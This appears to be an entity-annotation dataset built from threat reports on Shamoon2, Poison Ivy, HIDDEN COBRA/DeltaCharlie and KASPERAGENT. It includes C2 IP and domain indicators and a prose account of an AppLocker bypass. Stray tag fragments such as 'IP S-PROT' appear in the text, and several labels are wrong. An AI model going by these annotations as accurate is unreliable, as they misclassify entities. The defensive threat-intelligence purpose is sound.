{"text": "Shamoon2 : 104.218.120.128 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 26, "label": "Indicator"}]}
{"text": "Shamoon2 : 69.87.223.26 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 23, "label": "Indicator"}]}
{"text": "Shamoon2 : 5.254.100.200 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 24, "label": "Indicator"}]}
{"text": "Shamoon2 : 45.63.10.99 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 22, "label": "Indicator"}]}
{"text": "Shamoon2 : 104.238.184.252 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 26, "label": "Indicator"}]}
{"text": "Shamoon2 : analytics-google.org : 69/checkFile.aspx .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 51, "label": "Indicator"}]}
{"text": "Shamoon2 : analytics-google.org .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 31, "label": "Indicator"}]}
{"text": "Shamoon2 : 69.87.223.26:8080/p .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 30, "label": "Indicator"}]}
{"text": "Shamoon2 : go-microstf.com .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 26, "label": "Indicator"}]}
{"text": "Shamoon2 : 69.87.223.26:8080/eiloShaegae1 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 41, "label": "Indicator"}]}
{"text": "Shamoon2 : get.adobe.go-microstf.com .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 11, "end": 36, "label": "Indicator"}]}
{"text": "FireEye recently observed a sophisticated campaign targeting individuals within the Mongolian government .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 84, "end": 104, "label": "Organization"}]}
{"text": "Targeted individuals that enabled macros in a malicious Microsoft Word document may have been infected with Poison Ivy , a popular remote access tool ( RAT ) that has been used for nearly a decade for key logging , screen and video capture , file transfers , password theft , system administration , traffic relaying , and more .", "spans": [{"start": 34, "end": 79, "label": "Malware"}, {"start": 108, "end": 118, "label": "Malware"}, {"start": 131, "end": 149, "label": "System"}, {"start": 152, "end": 155, "label": "System"}]}
{"text": "The threat actors behind this attack demonstrated some interesting techniques , including :", "spans": [{"start": 0, "end": 17, "label": "Organization"}]}
{"text": "Customized evasion based on victim profile \u2013 The campaign used a publicly available technique to evade AppLocker application whitelisting applied to the targeted systems .", "spans": [{"start": 0, "end": 42, "label": "System"}]}
{"text": "Fileless execution and persistence \u2013 In targeted campaigns , threat actors often attempt to avoid writing an executable to the disk to avoid detection and forensic examination .", "spans": [{"start": 0, "end": 34, "label": "System"}, {"start": 61, "end": 74, "label": "Organization"}]}
{"text": "The campaign we observed used four stages of PowerShell scripts without writing the the payloads to individual files .", "spans": [{"start": 30, "end": 63, "label": "System"}]}
{"text": "Decoy documents \u2013 This campaign used PowerShell to download benign documents from the Internet and launch them in a separate Microsoft Word instance to minimize user suspicion of malicious activity .", "spans": [{"start": 0, "end": 15, "label": "System"}, {"start": 37, "end": 47, "label": "System"}, {"start": 125, "end": 134, "label": "Organization"}]}
{"text": "The threat actors used social engineering to convince users to run an embedded macro in a Microsoft Word document that launched a malicious PowerShell payload .", "spans": [{"start": 0, "end": 17, "label": "Organization"}, {"start": 23, "end": 41, "label": "System"}, {"start": 79, "end": 84, "label": "Malware"}, {"start": 90, "end": 113, "label": "System"}, {"start": 130, "end": 158, "label": "Malware"}]}
{"text": "The threat actors used two publicly available techniques , an AppLocker whitelisting bypass and a script to inject shellcode into the userinit.exe process .", "spans": [{"start": 0, "end": 17, "label": "Organization"}, {"start": 62, "end": 91, "label": "System"}, {"start": 98, "end": 104, "label": "System"}, {"start": 134, "end": 146, "label": "Indicator"}]}
{"text": "The malicious payload was spread across multiple PowerShell scripts , making its execution difficult to trace .", "spans": [{"start": 4, "end": 21, "label": "Malware"}, {"start": 40, "end": 67, "label": "System"}]}
{"text": "Rather than being written to disk as individual script files , the PowerShell payloads were stored in the registry .", "spans": [{"start": 67, "end": 86, "label": "System"}, {"start": 106, "end": 114, "label": "System"}]}
{"text": "Targets of the campaign received Microsoft Word documents via email that claimed to contain instructions for logging into webmail or information regarding a state law proposal .", "spans": [{"start": 33, "end": 57, "label": "System"}, {"start": 62, "end": 67, "label": "System"}, {"start": 122, "end": 129, "label": "System"}]}
{"text": "Microsoft application whitelisting solution AppLocker prevents unknown executables from running on a system .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 10, "end": 43, "label": "System"}, {"start": 44, "end": 53, "label": "System"}]}
{"text": "In April 2016 , a security researcher demonstrated a way to bypass this using regsvr32.exe , a legitimate Microsoft executable permitted to execute in many AppLocker policies .", "spans": [{"start": 78, "end": 90, "label": "Indicator"}, {"start": 95, "end": 126, "label": "System"}]}
{"text": "The regsvr32.exe executable can be used to download a Windows Script Component file ( SCT file ) by passing the URL of the SCT file as an argument .", "spans": [{"start": 4, "end": 16, "label": "Indicator"}, {"start": 54, "end": 61, "label": "System"}, {"start": 62, "end": 78, "label": "System"}, {"start": 86, "end": 89, "label": "System"}]}
{"text": "This technique bypasses AppLocker restrictions and permits the execution of code within the SCT file .", "spans": [{"start": 24, "end": 33, "label": "System"}]}
{"text": "In the decrypted shellcode , we also observed content and configuration related to Poison Ivy .", "spans": []}
{"text": "Correlating these bytes to the standard configuration of Poison Ivy , we can observe the following :", "spans": [{"start": 57, "end": 67, "label": "Vulnerability"}]}
{"text": "Active setup : StubPath .", "spans": []}
{"text": "Encryption/Decryption key : version2013 .", "spans": []}
{"text": "Mutex name : 20160509 .", "spans": []}
{"text": "Although Poison Ivy has been a proven threat for some time , the delivery mechanism for this backdoor uses recent publicly available techniques that differ from previously observed campaigns .", "spans": [{"start": 9, "end": 19, "label": "Vulnerability"}]}
{"text": "Through the use of PowerShell and publicly available security control bypasses and scripts , most steps in the attack are performed exclusively in memory and leave few forensic artifacts on a compromised host .", "spans": [{"start": 19, "end": 29, "label": "System"}, {"start": 34, "end": 90, "label": "System"}]}
{"text": "FireEye HX Exploit Guard is a behavior-based solution that is not affected by the tricks used here .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 8, "end": 24, "label": "System"}, {"start": 30, "end": 53, "label": "System"}]}
{"text": "It detects and blocks this threat at the initial level of the attack cycle when the malicious macro attempts to invoke the first stage PowerShell payload .", "spans": [{"start": 135, "end": 145, "label": "System"}]}
{"text": "Alert : HIDDEN COBRA - North Korea 's DDoS Botnet I-TOOL Infrastructure .", "spans": [{"start": 8, "end": 20, "label": "Organization"}, {"start": 38, "end": 42, "label": "System"}]}
{"text": "This joint Technical Alert ( TA ) is the result of analytic efforts between the Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) .", "spans": [{"start": 80, "end": 111, "label": "Organization"}, {"start": 114, "end": 117, "label": "Organization"}, {"start": 128, "end": 159, "label": "Organization"}, {"start": 162, "end": 165, "label": "Organization"}]}
{"text": "This alert provides technical details on the tools and infrastructure used by cyber actors of the North Korean government to target the media , aerospace , financial , and critical infrastructure sectors in the United States and globally .", "spans": []}
{"text": "Working with U.S. Government partners , DHS and FBI identified Internet Protocol ( IP ) addresses associated with a malware variant , known as DeltaCharlie , used to manage North Korea 's distributed denial-of-service ( DDoS ) botnet infrastructure .", "spans": [{"start": 18, "end": 28, "label": "Organization"}, {"start": 40, "end": 43, "label": "Organization"}, {"start": 48, "end": 51, "label": "Organization"}, {"start": 63, "end": 80, "label": "Indicator"}, {"start": 83, "end": 85, "label": "Indicator"}, {"start": 143, "end": 155, "label": "Malware"}, {"start": 227, "end": 248, "label": "System"}]}
{"text": "This alert contains indicators of compromise ( IOCs ) , malware descriptions , network signatures , and host-based rules to help network defenders detect activity conducted by the North Korean B-IDTY E-LOC government .", "spans": [{"start": 20, "end": 44, "label": "System"}, {"start": 47, "end": 51, "label": "System"}]}
{"text": "The U.S. Government refers to the malicious cyber activity by the North Korean government as HIDDEN COBRA .", "spans": [{"start": 9, "end": 19, "label": "Organization"}, {"start": 79, "end": 89, "label": "Organization"}, {"start": 93, "end": 105, "label": "Organization"}]}
{"text": "For more information related to HIDDEN COBRA activity , go to https://www.us-cert.gov/hiddencobra .", "spans": [{"start": 32, "end": 44, "label": "Organization"}, {"start": 62, "end": 97, "label": "Indicator"}]}
{"text": "If users or administrators detect the custom tools indicative of HIDDEN COBRA , these tools should be immediately flagged , reported to the DHS National Cybersecurity Communications and Integration Center ( NCCIC ) or the FBI Cyber Watch ( CyWatch ) , and given highest priority for enhanced mitigation .", "spans": [{"start": 65, "end": 77, "label": "Organization"}, {"start": 140, "end": 143, "label": "Organization"}, {"start": 144, "end": 204, "label": "Organization"}, {"start": 207, "end": 212, "label": "Organization"}, {"start": 222, "end": 225, "label": "Organization"}]}
{"text": "This alert identifies IP S-PROT addresses linked to systems infected with DeltaCharlie malware and provides descriptions of the malware and associated malware signatures .", "spans": [{"start": 22, "end": 41, "label": "System"}, {"start": 74, "end": 86, "label": "Malware"}]}
{"text": "DHS and FBI are distributing these IP S-PROT addresses to enable network defense activities and reduce exposure to the DDoS command-and-control network .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 8, "end": 11, "label": "Organization"}, {"start": 35, "end": 54, "label": "System"}]}
{"text": "FBI has high confidence that HIDDEN COBRA actors are using the IP S-PROT addresses for further network exploitation .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 29, "end": 41, "label": "Organization"}, {"start": 63, "end": 82, "label": "System"}]}
{"text": "This alert includes technical indicators related to specific North Korean government cyber operations and provides suggested response actions to those indicators , recommended mitigation techniques , and information on reporting incidents to the U.S. Government .", "spans": [{"start": 74, "end": 84, "label": "Organization"}, {"start": 251, "end": 261, "label": "Organization"}]}
{"text": "On August 23 , 2017 , DHS published a Malware Analysis Report ( MAR-10132963 ) that examines malware functionality to provide detailed code analysis and insight into specific tactics , techniques , and procedures ( TTPs ) observed in the malware .", "spans": [{"start": 22, "end": 25, "label": "Organization"}]}
{"text": "Since 2009 , HIDDEN COBRA actors have leveraged their capabilities to target and compromise a range of victims ; some intrusions have resulted in the Exfiltration of data while others have been disruptive in nature .", "spans": [{"start": 13, "end": 25, "label": "Organization"}]}
{"text": "Commercial reporting has referred to this activity as Lazarus Group and Guardians of Peace .", "spans": [{"start": 54, "end": 61, "label": "Organization"}, {"start": 72, "end": 90, "label": "Organization"}]}
{"text": "DHS and FBI assess that HIDDEN COBRA actors will continue to use cyber operations to advance their government 's military and strategic objectives .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 8, "end": 11, "label": "Organization"}, {"start": 24, "end": 36, "label": "Organization"}]}
{"text": "Cyber analysts are encouraged to review the information provided in this alert to detect signs of malicious network activity .", "spans": []}
{"text": "Tools and capabilities used by HIDDEN COBRA actors include DDoS botnet S-ACTs , keyloggers , remote access tools ( RATs ) , and wiper malware .", "spans": [{"start": 31, "end": 43, "label": "Organization"}, {"start": 59, "end": 77, "label": "System"}, {"start": 80, "end": 90, "label": "System"}, {"start": 93, "end": 112, "label": "System"}, {"start": 115, "end": 119, "label": "System"}, {"start": 128, "end": 133, "label": "Malware"}]}
{"text": "Variants of malware and tools used by HIDDEN COBRA actors include Destover , Wild Positron E-MAL/Duuzer , and Hangman .", "spans": [{"start": 38, "end": 50, "label": "Organization"}, {"start": 66, "end": 74, "label": "Malware"}, {"start": 77, "end": 81, "label": "Malware"}, {"start": 82, "end": 103, "label": "Malware"}, {"start": 110, "end": 117, "label": "Malware"}]}
{"text": "DHS has previously released Alert TA14-353A , which contains additional details on the use of a server message block ( SMB ) worm tool employed by these actors .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 96, "end": 116, "label": "Indicator"}, {"start": 119, "end": 122, "label": "Indicator"}, {"start": 125, "end": 129, "label": "Malware"}]}
{"text": "Further research is needed to understand the full breadth of this group 's cyber capabilities .", "spans": []}
{"text": "In particular , DHS recommends that more research should be conducted on the North Korean cyber activity that has been reported by cybersecurity and threat research firms .", "spans": [{"start": 16, "end": 19, "label": "Organization"}]}
{"text": "HIDDEN COBRA actors commonly target systems running older , unsupported versions of Microsoft operating systems .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 84, "end": 93, "label": "Organization"}]}
{"text": "The multiple vulnerabilities in these older systems provide cyber actors many targets for exploitation .", "spans": []}
{"text": "These actors have also used Adobe Flash player vulnerabilities to gain initial entry into users' environments .", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 34, "end": 46, "label": "System"}]}
{"text": "HIDDEN COBRA is known to use vulnerabilities affecting various applications .", "spans": [{"start": 0, "end": 12, "label": "Organization"}]}
{"text": "These vulnerabilities include :", "spans": []}
{"text": "CVE-2015-6585 : Hangul Word Processor Vulnerability .", "spans": [{"start": 0, "end": 13, "label": "Vulnerability"}, {"start": 16, "end": 37, "label": "System"}]}
{"text": "CVE-2015-8651 : Adobe Flash Player 18.0.0.324 and 19.x Vulnerability .", "spans": [{"start": 0, "end": 13, "label": "Vulnerability"}, {"start": 16, "end": 34, "label": "System"}]}
{"text": "CVE-2016-0034 : Microsoft Silverlight 5.1.41212.0 Vulnerability .", "spans": [{"start": 0, "end": 13, "label": "Vulnerability"}, {"start": 16, "end": 37, "label": "System"}]}
{"text": "CVE-2016-1019 : Adobe Flash Player 21.0.0.197 Vulnerability .", "spans": [{"start": 0, "end": 13, "label": "Vulnerability"}, {"start": 16, "end": 34, "label": "System"}]}
{"text": "CVE-2016-4117 : Adobe Flash Player 21.0.0.226 Vulnerability .", "spans": [{"start": 0, "end": 13, "label": "Vulnerability"}, {"start": 16, "end": 34, "label": "System"}]}
{"text": "DHS recommends that organizations upgrade these applications to the latest version and patch level .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]}
{"text": "If Adobe Flash or Microsoft Silverlight is no longer required , DHS recommends that those applications be removed from systems .", "spans": [{"start": 3, "end": 8, "label": "Organization"}, {"start": 9, "end": 14, "label": "System"}, {"start": 18, "end": 27, "label": "Organization"}, {"start": 28, "end": 39, "label": "System"}, {"start": 64, "end": 67, "label": "Organization"}]}
{"text": "The IOCs provided with this alert include IP S-PROT addresses determined to be part of the HIDDEN COBRA botnet infrastructure , identified as DeltaCharlie .", "spans": [{"start": 4, "end": 8, "label": "System"}, {"start": 42, "end": 61, "label": "System"}, {"start": 91, "end": 103, "label": "Organization"}, {"start": 104, "end": 110, "label": "System"}, {"start": 142, "end": 154, "label": "Malware"}]}
{"text": "The DeltaCharlie DDoS bot was originally reported by Novetta in their 2016 Operation Blockbuster Malware Report .", "spans": [{"start": 4, "end": 16, "label": "Malware"}, {"start": 22, "end": 25, "label": "System"}, {"start": 53, "end": 60, "label": "Organization"}]}
{"text": "This malware has used the IP S-PROT addresses identified in the accompanying .csv and .stix files as both source and destination IPs .", "spans": [{"start": 26, "end": 45, "label": "System"}, {"start": 77, "end": 81, "label": "Indicator"}, {"start": 86, "end": 91, "label": "Indicator"}, {"start": 129, "end": 132, "label": "System"}]}
{"text": "In some instances , the malware may have been present on victims' networks for a significant period .", "spans": []}
{"text": "DeltaCharlie is a DDoS tool used by HIDDEN COBRA actors , and is referenced and detailed in Novetta 's Operation Blockbuster Destructive Malware report .", "spans": [{"start": 0, "end": 12, "label": "Malware"}, {"start": 36, "end": 48, "label": "Organization"}, {"start": 92, "end": 99, "label": "Organization"}]}
{"text": "The information related to DeltaCharlie from the Operation Blockbuster Destructive Malware report should be viewed in conjunction with the IP S-PROT addresses listed in the .csv and .stix files provided within this alert .", "spans": [{"start": 27, "end": 39, "label": "Malware"}, {"start": 139, "end": 158, "label": "System"}, {"start": 173, "end": 177, "label": "Indicator"}, {"start": 182, "end": 187, "label": "Indicator"}]}
{"text": "DeltaCharlie is a DDoS tool capable of launching Domain Name System ( DNS ) attacks , Network Time Protocol ( NTP ) attacks , and Carrier Grade NAT ( CGN ) attacks .", "spans": [{"start": 0, "end": 12, "label": "Malware"}, {"start": 49, "end": 67, "label": "System"}, {"start": 70, "end": 73, "label": "System"}, {"start": 86, "end": 107, "label": "Indicator"}, {"start": 110, "end": 113, "label": "Indicator"}, {"start": 130, "end": 147, "label": "System"}, {"start": 150, "end": 153, "label": "System"}]}
{"text": "The malware operates on victims' systems as a svchost-based service and is capable of downloading executables , changing its own configuration , updating its own binaries , terminating its own processes , and activating and terminating denial-of-service attacks .", "spans": []}
{"text": "HIDDEN COBRA IOCs related to DeltaCharlie are provided within the accompanying .csv and .stix files of this alert .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 13, "end": 17, "label": "System"}, {"start": 29, "end": 41, "label": "Malware"}, {"start": 79, "end": 83, "label": "Indicator"}, {"start": 88, "end": 93, "label": "Indicator"}]}
{"text": "DHS and FBI recommend that network administrators review the IP S-PROT addresses , file hashes , network signatures , and YARA rules provided , and add the IPs to their watchlist to determine whether malicious activity has been observed within their organization .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 8, "end": 11, "label": "Organization"}, {"start": 61, "end": 80, "label": "System"}, {"start": 83, "end": 94, "label": "System"}, {"start": 97, "end": 115, "label": "System"}, {"start": 122, "end": 126, "label": "System"}, {"start": 156, "end": 159, "label": "System"}]}
{"text": "When reviewing network perimeter logs for the IP S-PROT addresses , organizations may find numerous instances of these IP S-PROT addresses attempting to connect to their systems .", "spans": [{"start": 46, "end": 65, "label": "System"}, {"start": 119, "end": 138, "label": "System"}]}
{"text": "Upon reviewing the traffic from these IP S-PROT addresses , system owners may find that some traffic corresponds to malicious activity and some to legitimate activity .", "spans": [{"start": 38, "end": 57, "label": "System"}, {"start": 60, "end": 66, "label": "System"}]}
{"text": "System owners are also advised to run the YARA tool on any system they suspect to have been targeted by HIDDEN COBRA actors .", "spans": [{"start": 0, "end": 6, "label": "System"}, {"start": 42, "end": 46, "label": "System"}, {"start": 59, "end": 65, "label": "System"}, {"start": 104, "end": 116, "label": "Organization"}]}
{"text": "This section contains network signatures and host-based rules that can be used to detect malicious activity associated with HIDDEN COBRA actors .", "spans": [{"start": 22, "end": 40, "label": "System"}, {"start": 45, "end": 61, "label": "System"}, {"start": 124, "end": 136, "label": "Organization"}]}
{"text": "Although created using a comprehensive vetting process , the possibility of false positives always remains .", "spans": []}
{"text": "These signatures and rules should be used to supplement analysis and should not be used as a sole source of attributing this activity to HIDDEN COBRA actors .", "spans": [{"start": 137, "end": 149, "label": "Organization"}]}
{"text": "A successful network intrusion can have severe impacts , particularly if the compromise becomes public and sensitive information is exposed .", "spans": []}
{"text": "Possible impacts include : temporary or permanent loss of sensitive or proprietary information , disruption to regular operations , financial losses incurred to restore systems and files , and potential harm to an organization 's reputation .", "spans": []}
{"text": "Network administrators are encouraged to apply the following recommendations , which can prevent as many as 85 percent of targeted cyber intrusions .", "spans": []}
{"text": "The mitigation strategies provided may seem like common sense .", "spans": []}
{"text": "However , many organizations fail to use these basic security measures , leaving their systems open to compromise :", "spans": []}
{"text": "Patch applications and operating systems .", "spans": []}
{"text": "Most attackers target vulnerable applications and operating systems .", "spans": [{"start": 50, "end": 67, "label": "System"}]}
{"text": "Ensuring that applications and operating systems are patched with the latest updates greatly reduces the number of exploitable entry points available to an attacker .", "spans": []}
{"text": "Use best practices when updating software and patches by only downloading updates from authenticated vendor sites .", "spans": [{"start": 33, "end": 41, "label": "System"}, {"start": 46, "end": 53, "label": "System"}]}
{"text": "Use application whitelisting .", "spans": []}
{"text": "Whitelisting is one of the best security strategies because it allows only specified programs to run while blocking all others , including malicious software .", "spans": [{"start": 139, "end": 157, "label": "Malware"}]}
{"text": "Restrict administrative privileges .", "spans": []}
{"text": "Threat actors are increasingly focused on gaining control of legitimate credentials , especially credentials associated with highly privileged accounts .", "spans": []}
{"text": "Reduce privileges to only those needed for a user 's duties .", "spans": []}
{"text": "Separate administrators into privilege tiers with limited access to other tiers .", "spans": []}
{"text": "Segment networks and segregate them into security zones .", "spans": []}
{"text": "Segment networks into logical enclaves and restrict host-to-host communications paths .", "spans": []}
{"text": "This helps protect sensitive information and critical services , and limits damage from network perimeter breaches .", "spans": []}
{"text": "Validate input .", "spans": []}
{"text": "Input validation is a method of sanitizing untrusted input provided by users of a web application .", "spans": []}
{"text": "Implementing input validation can protect against the security flaws of web applications by significantly reducing the probability of successful exploitation .", "spans": []}
{"text": "Types of attacks possibly averted include Structured Query Language ( SQL ) injection , cross-site scripting , and command injection .", "spans": []}
{"text": "Use stringent file reputation settings .", "spans": []}
{"text": "Tune the file reputation systems of your anti-virus software to the most aggressive setting possible .", "spans": []}
{"text": "Some anti-virus products can limit execution to only the highest reputation files , stopping a wide range of untrustworthy code from gaining control .", "spans": []}
{"text": "Understand firewalls .", "spans": [{"start": 11, "end": 20, "label": "System"}]}
{"text": "Firewalls provide security to make your network less susceptible to attack .", "spans": [{"start": 0, "end": 9, "label": "System"}]}
{"text": "They can be configured to block data and applications from certain locations ( IP S-PROT whitelisting ) , while allowing relevant and necessary data through .", "spans": [{"start": 79, "end": 101, "label": "System"}]}
{"text": "To protect against code injections and other attacks , system operators should routinely evaluate known and published vulnerabilities , periodically perform software updates and technology refreshes , and audit external-facing systems for known web application vulnerabilities .", "spans": [{"start": 211, "end": 234, "label": "System"}]}
{"text": "They should also take the following steps to harden both web applications and the servers hosting them to reduce the risk of network intrusion via this vector .", "spans": []}
{"text": "Use and configure available firewalls to block attacks .", "spans": [{"start": 28, "end": 37, "label": "System"}]}
{"text": "Take steps to secure Windows systems , such as installing and configuring Microsoft 's Enhanced Mitigation Experience Toolkit ( EMET ) and Microsoft AppLocker .", "spans": [{"start": 21, "end": 36, "label": "System"}, {"start": 74, "end": 83, "label": "Organization"}, {"start": 87, "end": 125, "label": "System"}, {"start": 128, "end": 132, "label": "System"}, {"start": 139, "end": 148, "label": "Organization"}, {"start": 149, "end": 158, "label": "System"}]}
{"text": "Monitor and remove any unauthorized code present in any www directories .", "spans": []}
{"text": "Disable , discontinue , or disallow the use of Internet Control Message Protocol ( ICMP ) and Simple Network Management Protocol ( SNMP ) as much as possible .", "spans": [{"start": 47, "end": 80, "label": "Indicator"}, {"start": 83, "end": 87, "label": "Indicator"}, {"start": 94, "end": 128, "label": "Indicator"}, {"start": 131, "end": 135, "label": "Indicator"}]}
{"text": "Remove unnecessary HTTP verbs from web servers .", "spans": [{"start": 19, "end": 23, "label": "Indicator"}, {"start": 35, "end": 46, "label": "System"}]}
{"text": "Typical web servers and applications only require GET , POST , and HEAD .", "spans": [{"start": 8, "end": 19, "label": "System"}]}
{"text": "Where possible , minimize server fingerprinting by configuring web servers to avoid responding with banners identifying the server software and version number .", "spans": [{"start": 63, "end": 74, "label": "System"}]}
{"text": "Secure both the operating system and the application .", "spans": []}
{"text": "Update and patch production servers regularly .", "spans": []}
{"text": "Disable potentially harmful SQL-stored procedure calls .", "spans": []}
{"text": "Sanitize and validate input to ensure that it is properly typed and does not contain escaped code .", "spans": []}
{"text": "Consider using type-safe stored procedures and prepared statements .", "spans": []}
{"text": "Audit transaction logs regularly for suspicious activity .", "spans": []}
{"text": "Perform penetration testing on web services .", "spans": [{"start": 31, "end": 43, "label": "System"}]}
{"text": "Ensure error messages are generic and do not expose too much information .", "spans": []}
{"text": "System operators should take the following steps to limit permissions , privileges , and access controls .", "spans": []}
{"text": "Reduce privileges to only those needed for a user 's duties .", "spans": []}
{"text": "Restrict users' ability ( permissions ) to install and run unwanted software applications , and apply the principle of Least Privilege to all systems and services .", "spans": [{"start": 119, "end": 134, "label": "System"}]}
{"text": "Restricting these privileges may prevent malware from running or limit its capability to spread through the network .", "spans": []}
{"text": "Carefully consider the risks before granting administrative rights to users on their own machines .", "spans": []}
{"text": "Scrub and verify all administrator accounts regularly .", "spans": []}
{"text": "Configure Group Policy to restrict all users to only one login session , where possible .", "spans": []}
{"text": "Enforce secure network authentication , where possible .", "spans": []}
{"text": "Instruct administrators to use non-privileged accounts for standard functions such as web browsing or checking webmail .", "spans": []}
{"text": "Segment networks into logical enclaves and restrict host-to-host communication paths .", "spans": []}
{"text": "Containment provided by enclaving also makes incident cleanup significantly less costly .", "spans": []}
{"text": "Configure firewalls to disallow Remote Desktop Protocol ( RDP ) traffic coming from outside of the network boundary , except for in specific configurations such as when tunneled through a secondary virtual private network ( VPN ) with lower privileges .", "spans": [{"start": 32, "end": 55, "label": "Indicator"}, {"start": 58, "end": 61, "label": "Indicator"}, {"start": 198, "end": 221, "label": "System"}, {"start": 224, "end": 227, "label": "System"}]}
{"text": "Audit existing firewall rules and close all ports that are not explicitly needed for business .", "spans": [{"start": 15, "end": 23, "label": "System"}]}
{"text": "Specifically , carefully consider which ports should be connecting outbound versus inbound .", "spans": []}
{"text": "Enforce a strict lockout policy for network users and closely monitor logs for failed login activity .", "spans": []}
{"text": "Failed login activity can be indicative of failed intrusion activity .", "spans": []}
{"text": "If remote access between zones is an unavoidable business need , log and monitor these connections closely .", "spans": []}
{"text": "In environments with a high risk of interception or intrusion , organizations should consider supplementing password authentication with other forms of authentication such as challenge/response or multifactor authentication using biometric or physical tokens .", "spans": []}
{"text": "System operators should follow these secure logging practices .", "spans": []}
{"text": "Ensure event logging , including applications , events , login activities , and security attributes , is turned on or monitored for identification of security issues .", "spans": []}
{"text": "Configure network logs to provide adequate information to assist in quickly developing an accurate determination of a security incident .", "spans": []}
{"text": "Upgrade PowerShell to new versions with enhanced logging features and monitor the logs to detect usage of PowerShell commands , which are often malware-related .", "spans": [{"start": 8, "end": 18, "label": "System"}, {"start": 106, "end": 116, "label": "System"}]}
{"text": "Secure logs in a centralized location and protect them from modification .", "spans": []}
{"text": "Phantom of the Opaera :", "spans": []}
{"text": "New KASPERAGENT Malware Campaign .", "spans": [{"start": 4, "end": 15, "label": "Malware"}]}
{"text": "ThreatConnect has identified a KASPERAGENT malware campaign leveraging decoy Palestinian Authority documents .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 31, "end": 42, "label": "Malware"}, {"start": 77, "end": 98, "label": "Organization"}]}
{"text": "The samples date from April \u2013 May 2017 , coinciding with the run up to the May 2017 Palestinian Authority elections .", "spans": [{"start": 84, "end": 105, "label": "Organization"}]}
{"text": "Although we do not know who is behind the campaign , the decoy documents \u2019 content focuses on timely political issues in Gaza and the IP address hosting the campaign \u2019s command and control node hosts several other domains with Gaza registrants .", "spans": []}
{"text": "In this blog post we will detail our analysis of the malware and associated indicators , look closely at the decoy files , and leverage available information to make an educated guess on the possible intended target .", "spans": []}
{"text": "Associated indicators and screenshots of the decoy documents are all available here in the ThreatConnect platform .", "spans": [{"start": 91, "end": 104, "label": "Organization"}]}
{"text": "Some of the indicators in the following post were published on AlienVault OTX on 6/13 .", "spans": [{"start": 63, "end": 73, "label": "Organization"}]}
{"text": "KASPERAGENT is Microsoft Windows malware used in efforts targeting users in the United States , Israel , Palestinian Territories , and Egypt since July 2015 .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 15, "end": 24, "label": "Organization"}, {"start": 25, "end": 32, "label": "System"}]}
{"text": "The malware was discovered by Palo Alto Networks Unit 42 and ClearSky Cyber Security , and publicized in April 2017 in the Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA blog .", "spans": [{"start": 30, "end": 48, "label": "Organization"}, {"start": 49, "end": 56, "label": "Organization"}, {"start": 61, "end": 84, "label": "Organization"}, {"start": 165, "end": 176, "label": "Malware"}, {"start": 181, "end": 190, "label": "Malware"}]}
{"text": "It is called KASPERAGENT based on PDB strings identified in the malware such as \u201c c : UsersUSADocumentsVisual Studio 2008ProjectsNew folder ( 2 ) kasperReleasekasper.pdb \u201d .", "spans": [{"start": 13, "end": 24, "label": "Malware"}, {"start": 82, "end": 169, "label": "Indicator"}]}
{"text": "The threat actors used shortened URLs in spear phishing messages and fake news websites to direct targets to download KASPERAGENT .", "spans": [{"start": 118, "end": 129, "label": "Malware"}]}
{"text": "Upon execution , KASPERAGENT drops the payload and a decoy document that displays Arabic names and ID numbers .", "spans": [{"start": 17, "end": 28, "label": "Malware"}]}
{"text": "The malware establishes persistence and sends HTTP requests to the command and control domain mailsinfo.net .", "spans": [{"start": 46, "end": 50, "label": "Indicator"}, {"start": 94, "end": 107, "label": "Indicator"}]}
{"text": "Of note , the callbacks were to PHP scripts that included / dad5 / in the URLs .", "spans": []}
{"text": "Most samples of the malware reportedly function as a basic reconnaissance tool and downloader .", "spans": []}
{"text": "However , some of the recently identified files display \u201c extended-capability \u201d", "spans": []}
{"text": "including the functionality to steal passwords , take screenshots , log keystrokes , and steal files .", "spans": []}
{"text": "These \u201c extended-capability \u201d", "spans": []}
{"text": "samples called out to an additional command and control domain , stikerscloud.com .", "spans": [{"start": 65, "end": 81, "label": "Indicator"}]}
{"text": "Additionally , early variants of KASPERAGENT used \u201c Chrome \u201d", "spans": [{"start": 33, "end": 44, "label": "Malware"}, {"start": 52, "end": 58, "label": "System"}]}
{"text": "as the user agent , while more recent samples use \u201c OPAERA \u201d", "spans": []}
{"text": "\u2013 a possible misspelling of the \u201c Opera \u201d", "spans": [{"start": 34, "end": 39, "label": "System"}]}
{"text": "\u2013 browser .", "spans": []}
{"text": "The indicators associated with the blog article are available in the ThreatConnect Technical Blogs and Reports source here .", "spans": [{"start": 69, "end": 82, "label": "Organization"}]}
{"text": "The samples we identified leverage the same user agent string \u201c OPAERA \u201d", "spans": []}
{"text": ", included the kasper PDB string reported by Unit 42 , and used similar POST and GET requests .", "spans": [{"start": 45, "end": 52, "label": "Organization"}]}
{"text": "The command and control domains were different , and these samples used unique decoy documents to target their victims .", "spans": []}
